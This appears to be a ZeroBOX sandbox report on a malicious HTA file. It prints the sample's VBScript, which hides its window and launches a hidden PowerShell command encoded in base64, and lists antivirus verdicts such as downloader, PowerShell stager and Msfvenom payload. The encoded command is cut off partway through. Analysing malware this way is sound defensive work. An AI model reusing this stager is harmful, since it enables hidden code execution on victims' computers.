popup
Static | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

Static Analysis

No static analysis available.
<script language="VBScript">
window.moveTo -4000, -4000
Set oYF_mILKkDd = CreateObject("Wscript.Shell")
Set aFEZ = CreateObject("Scripting.FileSystemObject")
For each path in Split(oYF_mILKkDd.ExpandEnvironmentStrings("%PSModulePath%"),";")
If aFEZ.FileExists(path + "\..\powershell.exe") Then
oYF_mILKkDd.Run "powershell.exe -nop -w hidden -e aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYgA9ACQAZQBuAHYAOgB3AGkAbgBkAGkAcgArACcAXABzAHkAcwB3AG8AdwA2ADQAXABXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXAB2ADEALgAwAFwAcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACcAfQA7ACQAcwA9AE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAUwB0AGEAcgB0AEkAbgBmAG8AOwAkAHMALgBGAGkAbABlAE4AYQBtAGUAPQAkAGIAOwAkAHMALgBBAHIAZwB1AG0AZQBuAHQAcwA9ACcALQBuAG8AcAAgAC0AdwAgAGgAaQBkAGQAZQBuACAALQBjACAAJgAoAFsAcwBjAHIAaQBwAHQAYgBsAG8AYwBrAF0AOgA6AGMAcgBlAGEAdABlACgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBJAE8ALgBTAHQAcgBlAGEAbQBSAGUAYQBkAGUAcgAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEcAegBpAHAAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABTAHkAcwB0AGUAbQAuAEkATwAuAE0AZQBtAG8AcgB5AFMAdAByAGUAYQBtACgALABbAFMAeQBzAHQAZQBtAC4AQwBvAG4A
Exit For
End If
Next
window.close()
</script>
Antivirus Signature
Bkav Clean
Lionic Trojan.Script.Agent.4!c
tehtris Clean
Cynet Malicious (score: 99)
CTX txt.trojan.generic
CAT-QuickHeal Script.Trojan.42447
Skyhigh BehavesLike.HTML.Dropper.zr
ALYac Trojan.Script.905440
Malwarebytes Clean
Zillya Clean
Sangfor Malware.Generic-VBS.Save.facd9283
CrowdStrike Clean
K7GW Clean
K7AntiVirus Clean
Baidu VBS.Trojan-Downloader.Agent.va
VirIT Clean
Symantec VBS.Heur.SNIC
ESET-NOD32 VBS/Agent.NUI
TrendMicro-HouseCall Clean
Avast VBS:Obfuscated-GQ [Cryp]
ClamAV Vbs.Backdoor.Msfvenom_Payload-9951533-0
Kaspersky HEUR:Trojan.VBS.Agent.gen
BitDefender Trojan.Script.905440
NANO-Antivirus Trojan.Html.Downloader.fqlyhy
ViRobot Clean
MicroWorld-eScan Trojan.Script.905440
Tencent Heur:Trojan.Powershell.Generic.d
Sophos Mal/PSDL-B
F-Secure Backdoor:HTML/PowerShellStager.A
DrWeb Trojan.Siggen28.55374
VIPRE Trojan.Script.905440
TrendMicro Clean
CMC Clean
Emsisoft Trojan.Script.905440 (B)
huorong Trojan/HTML.Agent.a
FireEye Trojan.Script.905440
Jiangmin Clean
Varist VBS/Agent.AXB!Eldorado
Avira VBS/PSRunner.VPA
Fortinet VBS/Inject.B!tr
Antiy-AVL Clean
Kingsoft Win32.Infected.AutoInfector.a
Gridinsoft Clean
Xcitium TrojWare.VBS.Agent.NUI@8a4oj4
Arcabit Trojan.Script.DDD0E0
SUPERAntiSpyware Clean
ZoneAlarm HEUR:Trojan.VBS.Agent.gen
Microsoft TrojanDropper:VBS/PSRunner.G!MSR
Google Detected
AhnLab-V3 Clean
Acronis Clean
McAfee PS/Injector.d
TACHYON Clean
VBA32 Clean
Zoner Clean
Rising Dropper.Ploty!8.EEC8 (TOPIS:E0:Q0eCX8vJheP)
Yandex Clean
Ikarus Trojan.PowerShell.Agent
MaxSecure Clean
GData Trojan.Script.905440
AVG VBS:Obfuscated-GQ [Cryp]
Panda Clean
alibabacloud Trojan:Win/PSRunner.G9OHT
No IRMA results available.